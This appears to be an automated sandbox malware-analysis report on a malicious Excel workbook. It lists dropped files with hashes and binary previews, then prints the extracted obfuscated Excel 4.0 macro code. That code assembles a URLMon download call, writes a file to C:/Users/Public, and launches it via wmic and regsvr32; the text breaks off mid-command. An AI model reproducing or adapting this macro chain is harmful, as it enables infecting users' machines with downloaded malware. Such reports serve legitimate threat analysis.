                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Preview: .PNG........IHDR.......N.............sRGB.........gAMA......a.....pHYs..........&.?..<.IDATx^.wxTU...........M..+....G..J.^.P.T...6:.$$....H..J.......u.a2LB(F.g]n.....Y..W...+..r..U.o.$'/...o./.E..R.r.y..D.G.P..R.@A.....b...O?..n....0Pbc.d..)Gu.^..|\.'..K.c..IJJ...`.......4o...]G*V.$/...<..S.<.<RD..s...../^B...._.*U.J.F..{..2|.p..S.N....[\.q.o.......e.....$.}..4k.L^...y.R./_~.=....H.......\c;.. .a.9sI..9..2e^.V.ZK@@.......2.W..q..L.?..CN.>-.7o...H...o....B.)R......^.......<A.{;...k..o....7..\M..+.....J...ge.U2v.X...T.PA.z...-ZL...&O...ooP.~...-l.c3..}..7.m.....w..>...r..IY.h....o..{m.*^....[."..2..\.....)[.....v.zJ.|LJ.zB.x.)3.T..g3...K..T......c.c...k2j.(...7..>..e.b/_.BF.....i....y...6|f}4......+*[..T.\Y..+-[..n..o...o..VM./..+={~,.;v..M.J...b...K.5.......x,.q.f..e...+)3v%3...W....k...N.........:.-3.l.}...D.*T.(W...o..&S.D....d....g..9r..?~\N.8............r.J.5k.9w...4X......=..sz.{~@...&.c.Rf.Jf..>..U..bbb.>2....9......
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\8BB07D5B.png
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:PNG image data, 30 x 30, 8-bit/color RGB, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1028
                                                                                                                                                  Entropy (8bit):7.761039651897249
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:OZYvitHj0T5rwDxmsYnNk56uCnIw2+ujc:O6vitHQT5rvn1ud+uA
                                                                                                                                                  MD5:600F503BC1066BEB5FB5DD494AA1CD74
                                                                                                                                                  SHA1:A504D5E687B98F9E0FD2896DFC8492DE0F974BE6
                                                                                                                                                  SHA-256:B06BA2FAAAF371AE2F92D9047FFDAAF1933E03CFBC1E999E8B7CF378E33499C3
                                                                                                                                                  SHA-512:B7D40CDCD4F442E8941947AF64343D8A06CA8C9710E74BE8E00245C5A67DF574ED243D2B988814843C0AD9483D7058EC355CE087665FFDA5C484CBDF8FD40E40
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Preview: .PNG........IHDR..............R9.....sRGB.........pHYs...t...t..f.x....IDATHK..YL.Q......Vl.P. .qC.(....(.".-..q....%1.q./F.Q.L\./4.KlX.Q...EE..(. ..V.i;.z...h..7.0........(...|s.k.J.Mm].J|.3........W.&EE..s.hS.}.....%^x`s....s..Rb..9....jw...o.e..17=:!&..X.Q._.!. |....N$.L.1.N..}.k..v..2.piZ..A.,.l.w......I.{...p...C[......'.........b....:f.\?!3MK........Cb..B.....%`?1..Y>9\....P.......z..uK...g.V.P.U.3...L.j.?(.g.....}.=.}......L.B.{...i.!..-q....9(=%^......&.q.j..>.q...w.NO.@.D..jmnL...U.R0B=6...U....P}Koh.D@"...]9...r,. .."2.......[.~ .......... .ay....nCm'...(..$......_4....*gNT..02h...zT.b.hhF..E.l.Z..J8.....=..H.{....Q...hg.g...u_!...T7./..+...u.....m...C]..E-..ki.CS..2.V..v>.?..$d..U.o.o...w........."....7..g...O]...U`..........g..A.j.....b...\.s(I.......@._B....i..2.I..7W.6....`..!r].P.......^.8n ..X...+3...F.....!x...H..fkYu....y.l...(../.y....,;~qV.R!#C.q...yoE..{O:...R.......c...Z;..[.x.....#N...'....M..@...n0..nD..!..p.!J....
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\A09996EC.png
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:PNG image data, 30 x 30, 8-bit/color RGB, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):677
                                                                                                                                                  Entropy (8bit):7.433026174405032
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:6v/7RllfMXWaBlhV/Jk6gGPRRKyiaWH/LpR5PTQ6//blm1X+fZ8w5s7nP9Np971x:OZYZnDqkZiaOtnEuA1X+a0sL1L9cLUa6
                                                                                                                                                  MD5:55E8A29B221E51BE421B7D4F5F5F7E52
                                                                                                                                                  SHA1:117E73181FC9CDAA0904C6372D68EE48CEDC14E4
                                                                                                                                                  SHA-256:B54D8571DB2F8FC570144F24EF7A42CE93FAB269AF166BF1234DBD2F96D86EB8
                                                                                                                                                  SHA-512:8592A133D815BBC225336F9149A4C89244CBCDEACC958470126DCD266DA8590C587D50D56A7F70771568C4D015BF55642DAAD6434F1C47E8BBBC4AB691694654
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Preview: .PNG........IHDR..............R9.....sRGB.........pHYs...t...t..f.x...JIDATHKc...?...g..l.;k...FF...@H..jb`d..?-P'.SYA......f.........'.?............{K.a..:..W..s.~.....{.....<.....9.......[.=\{.._FN^._{'{3VM?.p..v._....v..;..s...O.....*.|........yaz....!/...........o..xZ.Sn...O+YP.122.....33.A..3.?.DR...+.F...o.M_..h.W...}..K?.........*....z..K...........F?..{............|..`!l*X...E.....$.......3... ..0....+.r.D.D7e.&.b...t...../..o.I2.p...yl.J|.Y0j4Z....!.s#;.XW.gbd`.bb........X..ue...'fi..[1..!.@.......s.:(..e`}.. ...-...1.. J..(`..,}.X...H.>".m?..h .X.D.5Ff......y"4.P.4d...@.A..8.[?..7q....I.*.M..[.>\{....j..Y3...3.5'......op.....IEND.B`.
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\A7CB9FA0.png
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:PNG image data, 287 x 78, 8-bit/color RGBA, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):15644
                                                                                                                                                  Entropy (8bit):7.974497191204788
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:EZRPEsXoz+jRHBbn1+3rhK0XwN8KHpy/c2C9NZ9ff:EZ6sYijj43VK0XwmKJ39Nnf
                                                                                                                                                  MD5:29A9EE6FB5591751FC60ECD0FDB9478D
                                                                                                                                                  SHA1:D8A58D27A5D77416E1B882FDE001FE827EB0C1F5
                                                                                                                                                  SHA-256:F2E6BD48ACC89A7DF730F5FE7FD0A19112FEF2C59BFEDF607996B1062337FC8F
                                                                                                                                                  SHA-512:5465ABC4330E88D0490B5F61532B990859600F920D4ACA8F4A9013344B478EF51823D37E850ECF67829EEDFB80C00B6324EFE97DD175E56985C1AC07ED890AFE
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Preview: .PNG........IHDR.......N.............sRGB.........gAMA......a.....pHYs..........&.?..<.IDATx^.wxTU...........M..+....G..J.^.P.T...6:.$$....H..J.......u.a2LB(F.g]n.....Y..W...+..r..U.o.$'/...o./.E..R.r.y..D.G.P..R.@A.....b...O?..n....0Pbc.d..)Gu.^..|\.'..K.c..IJJ...`.......4o...]G*V.$/...<..S.<.<RD..s...../^B...._.*U.J.F..{..2|.p..S.N....[\.q.o.......e.....$.}..4k.L^...y.R./_~.=....H.......\c;.. .a.9sI..9..2e^.V.ZK@@.......2.W..q..L.?..CN.>-.7o...H...o....B.)R......^.......<A.{;...k..o....7..\M..+.....J...ge.U2v.X...T.PA.z...-ZL...&O...ooP.~...-l.c3..}..7.m.....w..>...r..IY.h....o..{m.*^....[."..2..\.....)[.....v.zJ.|LJ.zB.x.)3.T..g3...K..T......c.c...k2j.(...7..>..e.b/_.BF.....i....y...6|f}4......+*[..T.\Y..+-[..n..o...o..VM./..+={~,.;v..M.J...b...K.5.......x,.q.f..e...+)3v%3...W....k...N.........:.-3.l.}...D.*T.(W...o..&S.D....d....g..9r..?~\N.8............r.J.5k.9w...4X......=..sz.{~@...&.c.Rf.Jf..>..U..bbb.>2....9......
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\86810000
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):277688
                                                                                                                                                  Entropy (8bit):7.553565332828095
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:2OOQStlBQdeequOVllS/2HMBh3DdCG/gsux9R+XkXwGHZEYJtttgBAcBoCwsYijf:2ZllSdosux9RbXwGXJtttYlBJDy2sC
                                                                                                                                                  MD5:7F8E2F250B102531058343060B1A85D4
                                                                                                                                                  SHA1:DD7A964CB4296F66F817D8ADDD7C98A8CE82E786
                                                                                                                                                  SHA-256:E9B1B7DE87303FBBFE2CB786FED20B2A5412BE614FAA6BC346AB4F2473E13818
                                                                                                                                                  SHA-512:B2F2350D2358BAF844012C8E8B77F0C9D1554D720BB3CBC6323902F1394ADDE760850F803D72C5DFC26FE9FC3E8B26CF14B65CF5FAE56FA4F0FA43E36FFC8689
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: .T.n.0....?..........C....I?`M.%.|..$..w);n..V.....;3;...f.l...L.jf.B..6.k.....QQ......."......6"U...}...zt@M..9...A.....j......T.g....C,..q.O6W..^.)Y./.o.}.....5.2...^.!..je...C7.....1;..d.1=`.\..y.3....qEsY?....4.{....J..D.d.N0..i..y?....X.C.w..-...%..2.us.....B...5.T.....9..*<.4..RI...)...GhJASY.......DG.k.rx........B.[...O.T...c.!.~..@....7.....H.......:....>.H<..Nw...Kv...S6x..c.t`.i....2N5.#.r..........PK..........!..j0.............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................M
                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 16:19:49 2019, mtime=Wed Apr 7 08:15:09 2021, atime=Wed Apr 7 08:15:09 2021, length=12288, window=hide
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):904
                                                                                                                                                  Entropy (8bit):4.664611778571911
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:8uXUU+uElPCH2AlA/Ydfge+WrjAZ/2bD8q5LC5Lu4t2Y+xIBjKZm:889lA8AZiD8l87aB6m
                                                                                                                                                  MD5:6CE3AFC945BE909FF190D896DD565667
                                                                                                                                                  SHA1:DF73D53BE84ABFF95A80CD9D182CF41449C910BE
                                                                                                                                                  SHA-256:DA6A220EF782C366DA90F0ED03AB3AB55A895E2B14F1442F9278E9081E886111
                                                                                                                                                  SHA-512:42BA2B4B89AECC3B0709E4087489354CA41CBCDE70CA41D0048814FCD206EDC84DCED7E42D1FC4AFD9588FD5C29CF79DF46EC9E9C018D8D1D0F5C65F80257C5E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: L..................F........N....-......+......+...0......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R.I....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qwx..user.<.......Ny..R.I.....S....................[.i.h.a.r.d.z.....~.1......R.I..Desktop.h.......Ny..R.I.....Y..............>......;l.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......980108...........!a..%.H.VZAj...4.4...........-..!a..%.H.VZAj...4.4...........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Documents (252).xlsm.LNK
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:43 2020, mtime=Wed Apr 7 08:15:09 2021, atime=Wed Apr 7 08:15:09 2021, length=277679, window=hide
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):4340
                                                                                                                                                  Entropy (8bit):4.751501502393159
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:8kn74oxXHkB6pkn74oxXHkB6pXn74oxXHkB6pXn74oxXHkB6:8k7b3kKk7b3kK37b3kK37b3k
                                                                                                                                                  MD5:45C1EF5A74928CCC6915D627FC86A023
                                                                                                                                                  SHA1:ED7A22CEB778A70680BA3D7BE750CA0D8510340B
                                                                                                                                                  SHA-256:7097F37386BBDDB323256B0A956516B158499DF099D2E160EFCF45B2A16F9D5C
                                                                                                                                                  SHA-512:5D5F9AA38024C247F8991ECD492C5D1E51B85E1399DC5F2088D7B6E143F92E1F3E12D95AB61B9843B311817940B7E84E32B57E66B14A189AE21ACA565D237960
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview: L..................F.... ...U...:.......+......+...<...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R.I....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qwx..user.<.......Ny..R.I.....S....................[.i.h.a.r.d.z.....~.1.....>Qxx..Desktop.h.......Ny..R.I.....Y..............>......-Q.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....v.2..5...R.I .DOCUME~1.XLS..Z......>Qvx.R.I....h......................F..D.o.c.u.m.e.n.t.s. .(.2.5.2.)...x.l.s.m.......Z...............-.......Y...........>.S......C:\Users\user\Desktop\Documents (252).xlsm..+.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.D.o.c.u.m.e.n.t.s. .(.2.5.2.)...x.l.s.m.........:..,.LB.)...As...`.......X.......980108...........!a..%.H.VZAj......-.........-..!a..%.H.VZAj......-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.
                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                  Category:modified
                                                                                                                                                  Size (bytes):243
                                                                                                                                                  Entropy (8bit):4.67797989421538
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6:dj/HXPWEQSGXPWEdHXPWEQSGXPWEdHXPWEQSGXPWEdHXPWEc:dTHZfGZdHZfGZdHZfGZdHZc
                                                                                                                                                  MD5:D278AEF83499DC4E2D53C88DE6CB4283
                                                                                                                                                  SHA1:54A4A6A577D6B5D06B2911D92C4045AA98C0972B
                                                                                                                                                  SHA-256:50A0B13E409E7BA0B55879078E3C1A34A5F509F6DAF4EC7D5A8AB054DAC08440
                                                                                                                                                  SHA-512:37EAFE9906D739177EE86ADF69C63E478D27E4C29F2F547764B4AEA19F4792E6002610200C0204544C6865B64E80A45677B4148D0E64EB5B0685A24990CEAD31
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: Desktop.LNK=0..[misc]..Documents (252).xlsm.LNK=0..Documents (252).xlsm.LNK=0..[misc]..Documents (252).xlsm.LNK=0..Documents (252).xlsm.LNK=0..[misc]..Documents (252).xlsm.LNK=0..Documents (252).xlsm.LNK=0..[misc]..Documents (252).xlsm.LNK=0..
                                                                                                                                                  C:\Users\user\Desktop\57810000
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):277679
                                                                                                                                                  Entropy (8bit):7.553526172386211
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:LOOQStlBQdeequOVllS/2HMBh3DdCG/gsux9R+XkXwGHZEYJtttgBAcBoCwsYijn:LZllSdosux9RbXwGXJtttYlBJDy2sS
                                                                                                                                                  MD5:AD8790A31A98D48645566DBA29BC9371
                                                                                                                                                  SHA1:EB5A23745B961BB360C1773D33FB40D96CF3AF79
                                                                                                                                                  SHA-256:FDD3B70E991EDB4999AD263C8A83ECAB00072DD5128F011848B2C9687FAAD715
                                                                                                                                                  SHA-512:E710D48835E154D4D38C4CE11D16A54D0160DA4406DE7C807C0E89AB4676AF3A423FAA0AB41F6CBDCADF647E80328D2584FFE8BC8D250296B25C21BB561D1ED5
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: .T.n.0....?..........C....I?`M.%.|..$..w);n..V.....;3;...f.l...L.jf.B..6.k.....QQ......."......6"U...}...zt@M..9...A.....j......T.g....C,..q.O6W..^.)Y./.o.}.....5.2...^.!..je...C7.....1;..d.1=`.\..y.3....qEsY?....4.{....J..D.d.N0..i..y?....X.C.w..-...%..2.us.....B...5.T.....9..*<.4..RI...)...GhJASY.......DG.k.rx........B.[...O.T...c.!.~..@....7.....H.......:....>.H<..Nw...Kv...S6x..c.t`.i....2N5.#.r..........PK..........!..j0.............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................M
                                                                                                                                                  C:\Users\user\Desktop\~$Documents (252).xlsm
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):495
                                                                                                                                                  Entropy (8bit):1.6081032063576088
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:RFXI6dtBhFXI6dtBhFXI6dtt:RJZhJZhJ1
                                                                                                                                                  MD5:28C0C942161F749E335A76E714AACA29
                                                                                                                                                  SHA1:53D07F227E4A2F3AF5373958409A19DE1FA1CF9C
                                                                                                                                                  SHA-256:BA0AB47EA8285A45E0884C5916C7C3052BE3C5245A0FC350DF4E83B91BC2A3F5
                                                                                                                                                  SHA-512:075F04CF77A30D166E9C04A6376629508A854F9218CEA194EC1D69A65669C51F3A0858697F258AF0DF5954DE02C7EEF2D060B6F69D8194D4D4A95D2C94900DAE
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                  \Device\ConDrv
                                                                                                                                                  Process:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                  File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):160
                                                                                                                                                  Entropy (8bit):5.095703110114614
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1MgnRdde6JQAiveyzr:Yw7gJGWMXJXKSOdYiygKkXe/egXeAiv/
                                                                                                                                                  MD5:D54D3102F05E6BD2D7AF447501A743FF
                                                                                                                                                  SHA1:51BE8488225FE61E01A9AB4112CDB1231C80593B
                                                                                                                                                  SHA-256:CE9FED99E091E42C390FFBFF36D90A4DEC53BC3DDBAC6494ECCE9894618191B9
                                                                                                                                                  SHA-512:3770AB86E5F7C4784360F59F157AF850F1C84C86DF9EB129FA9E2F61145128404858A16D1F977DD6EB925246367E69232A87DBC87F386D81CC48E2AB77319B34
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ProcessId = 5488;...ReturnValue = 0;..};....

                                                                                                                                                  Static File Info

                                                                                                                                                  General

                                                                                                                                                  File type:Zip archive data, at least v2.0 to extract
                                                                                                                                                  Entropy (8bit):7.557820060670911
                                                                                                                                                  TrID:
                                                                                                                                                  • Excel Microsoft Office Open XML Format document (40004/1) 83.32%
                                                                                                                                                  • ZIP compressed archive (8000/1) 16.66%
                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                                                                                                                                                  File name:Documents (252).xlsm
                                                                                                                                                  File size:210308
                                                                                                                                                  MD5:966c13f10fa0b3bfe75da87bca817396
                                                                                                                                                  SHA1:1769db2ec1d019b526e63637a413ceab10d00ff3
                                                                                                                                                  SHA256:963963dd218deb7e041b5a2ccf85a48c12d62bd2bdc248d6636b332f234cba14
                                                                                                                                                  SHA512:e81cd50ab4b16286c51d62baba42170d4403947748d7d3ff4983588f9647b8912aa712fad263e9fd0119be04694d0d4ed8ad68f6d0b9d7b7ce06277e752e46e7
                                                                                                                                                  SSDEEP:1536:0jo+iv69kyln4llllllPtEEEEEEGl464S4A4jJ1rwsYijyKU2p9hYgryA:sLiC97l8Xf1LrDy2iE
                                                                                                                                                  File Content Preview:PK........E.yR................docProps/PK..........!..X..............docProps/app.xml.SAn.1..#q....'%.P.q.Z..@DJ..k.I,<.e.........,...0..?...$..W......l..ee..B...d8.I.V:... w....$.IX%..P..Dr._.`..<..!f(acA.).1.Q...q.c....J$,........|..&z........u...d.8...

                                                                                                                                                  File Icon

                                                                                                                                                  Icon Hash:74ecd0e2f696908c

                                                                                                                                                  Static OLE Info

                                                                                                                                                  General

                                                                                                                                                  Document Type:OpenXML
                                                                                                                                                  Number of OLE Files:1

                                                                                                                                                  OLE File "Documents (252).xlsm"

                                                                                                                                                  Indicators

                                                                                                                                                  Has Summary Info:
                                                                                                                                                  Application Name:
                                                                                                                                                  Encrypted Document:
                                                                                                                                                  Contains Word Document Stream:
                                                                                                                                                  Contains Workbook/Book Stream:
                                                                                                                                                  Contains PowerPoint Document Stream:
                                                                                                                                                  Contains Visio Document Stream:
                                                                                                                                                  Contains ObjectPool Stream:
                                                                                                                                                  Flash Objects Count:
                                                                                                                                                  Contains VBA Macros:

                                                                                                                                                  Macro 4.0 Code

                                                                                                                                                  ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=AC19(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=AA19(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL(AC20,AD20,""JCJ"",AE19,0)",,"=FORMULA.ARRAY(before.1.0.0.sheet!AK20&before.1.0.0.sheet!AK21&before.1.0.0.sheet!AK22&before.1.0.0.sheet!AK23&before.1.0.0.sheet!AK24&before.1.0.0.sheet!AK25&before.1.0.0.sheet!AK26&before.1.0.0.sheet!AK27,AC20)","=FORMULA.ARRAY(before.1.0.0.sheet!AL20&before.1.0.0.sheet!AL21&before.1.0.0.sheet!AL22&before.1.0.0.sheet!AL23&before.1.0.0.sheet!AL24&before.1.0.0.sheet!AL25&
before.1.0.0.sheet!AL26&before.1.0.0.sheet!AL27&before.1.0.0.sheet!AL28&before.1.0.0.sheet!AL29&before.1.0.0.sheet!AL30&before.1.0.0.sheet!AL31&before.1.0.0.sheet!AL32&before.1.0.0.sheet!AL33&before.1.0.0.sheet!AL34&before.1.0.0.sheet!AL35,AD20)",C:/Users/Public,/dbhfr.xref,"=FORMULA.ARRAY(""A"",before.1.0.0.sheet!AE20)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL(""UR""&before.1.0.0.sheet!AN21,before.1.0.0.sheet!AO20&before.1.0.0.sheet!AO21&before.1.0.0.sheet!AO22&before.1.0.0.sheet!AO23&before.1.0.0.sheet!AO24&before.1.0.0.sheet!AO25&before.1.0.0.sheet!AO26&before.1.0.0.sheet!AO27&before.1.0.0.sheet!AO28&before.1.0.0.sheet!AO29&before.1.0.0.sheet!AO30&before.1.0.0.sheet!AO31&before.1.0.0.sheet!AO32&before.1.0.0.sheet!AO33&before.1.0.0.sheet!AO34&before.1.0.0.sheet!AO35&before.1.0.0.sheet!AO36&before.1.0.0.sheet!AE20,AI27,0,A99,before.1.0.0.sheet!AE19&before.1.0.0.sheet!AF19,0,0)",,Kernel32,CreateDirectoryA,A,,,,,,K,C,,,U,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=AF28(),,=AD19(),=AG19(),,,=AA17(),,,,e,r,,LMon,R,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,r,e,,,L,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,n,a,,,D,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,e,t,,,o,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,l,e,,,w,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,3,D,,,n,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,JJCCBB,,2,i,,,l,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(""wmic.exe ""&"" process call create 'regsvr32 -s 
